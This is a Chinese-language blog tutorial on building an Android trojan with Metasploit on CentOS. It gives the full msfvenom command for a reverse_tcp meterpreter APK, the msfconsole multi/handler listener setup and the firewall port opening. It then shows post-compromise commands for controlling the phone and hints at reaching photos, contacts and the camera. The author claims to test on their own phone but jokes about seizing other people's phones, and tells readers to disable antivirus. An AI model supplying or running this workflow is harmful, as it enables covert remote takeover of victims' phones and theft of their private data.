Centos Linux下使用Metasploit滲透android
Metasploit是一款開源的安全漏洞檢測工具
Metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業人士識別安全性問題,驗證漏洞的緩解措施,並管理專家驅動的安全性進行評估,提供真正的安全風險情報。這些功能包括智慧開發,程式碼審計,Web應用程式掃描,社會工程。
這篇文件只適合在Centos Linux已經安裝了Metasploit的大夥。沒有安裝Metasploit的小夥們,可以前往
https://blog.csdn.net/wyvbboy/article/details/51526640
部落格去瀏覽並安裝,然後再回來~(如果此部落格的安裝已經過期了,官方找或者網上找)
看完Metasploit簡介後,其下有一個工具msfvenom可以生成木馬,開啟linux終端,最好登入root,怕出錯,然後輸入命令
$ msfvenom
Enter下看看都啥?一大堆指令讓你煩~
先檢視一下所有型別的攻擊負荷(看成木馬也行),輸入命令
$ msfvenom --list payloadsEnter下來,資料很多,我們從裡面找Android型別的就行,我是來操控手機的,不會幹其它的
複製一下黃色框的欄位,tcp格式的,接下來會用到
android/meterpreter/reverse_tcp
知道了“木馬”的名稱,還得知道終端的ip,輸入ifconfig檢視內網ip(俺的是本地測試的)
$ ifconfig
ip拿到了,還不趕緊的開始生成木木馬-_-,msfvenom兄弟,靠你了,輸入
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.122.129 LPORT=3333 R > first.apk
-p, --payload 使用攻擊負荷。指定一個’-'或者輸入(stdin)使用者自定義的payloads(攻擊負荷)。
LHOST ip地址LPORT 自定義埠(注意,那些所謂的防火牆全踏馬都要關閉,記得埠要放行且沒被佔用,不然滲透沒軟用)
生成的木馬最好能放在一個可以訪問的資料夾上,我直接first.apk,在終端目前路徑上可以看到有檔案生成。如果沒有,那就是失敗了,檢查一下你的埠是否佔用!生成成功的編譯大概會出現Payload size: 10181 bytes欄位
木馬生成完畢,msfvenom兄弟的工作就基本完工了,接下來就有請msfconsole上場了,沒錯,就是開啟metasploit的控制檯,著手配置相關資訊,開始滲透了~
直接輸入msfconsole
$ msfconsole
長久看多了單調程式碼的你,下面的圖形程式碼有沒有讓你灰色的世界多點點色彩~~
談正事~我們需要配置什麼呢?前面生成木馬的時候不是設定了ip和埠嗎?現在我們也要在控制檯上配置ip和埠,做監聽來的
要做的流程大概是這些
(在msfconsole模式下)載入exploit模組
msf > use exploit/multi/handler
(exploit模式下)選擇之前我們貼上過一次的攻擊載荷:android/meterpreter/reverse_tcp
msf exploit(multi/handler)> set payload android/meterpreter/reverse_tcp
(exploit模式下)檢視一下列表有沒有多出你設定的載荷
msf exploit(multi/handler)> show options
(exploit模式下)設定黃色框下的LHOST和LPORT,就設定成之前生成木馬搞的ip和埠
順便放行埠,輸入命令firewall-cmd --add-port=3333/tcp
firewall-cmd --add-port=3333/tcp # 開放通過tcp訪問3333
配置的流程都搞完了,馬上就是滲透了。
群靈覺醒,封印解除,出來吧!exploit
輸入命令exploit,開始監控,記住不要關掉,就坐等別人的手機安裝,然後別人點選的瞬間,俺這裡馬上獲取到別人手機的控制權,到時候,嘿嘿。當然,俺這裡是滲透自己的手機(然並軟—~)
既然是滲透自己的手機,把生成的木馬拿出來下載吧,俺這裡是ftp連線linux成功後,找到木馬下載安裝到自己的手機上(防毒軟體請關掉),我用的是xftp,只要你能把那個木馬拿出來下載,管你用什麼辦法~~
安裝好木馬後,點選開啟的瞬間,沒有啥反應。手機上沒反應沒關係,關鍵是終端exploit監聽有反應,並且開始滲透併成功。
如果終端沒有反應,就是防火牆的問題,設定的埠要放行
輸個?,檢視命令列表
比如檢視下手機資訊
sysinfo
想開啟某個應用,輸入app_list檢視app列表
然後使用使用app_run命令開啟app對應的package名稱
手機上的termux就會自己啟動
好了,還有關於相簿或者通訊錄、照相什麼的指令就不講了,你們自己探究探究吧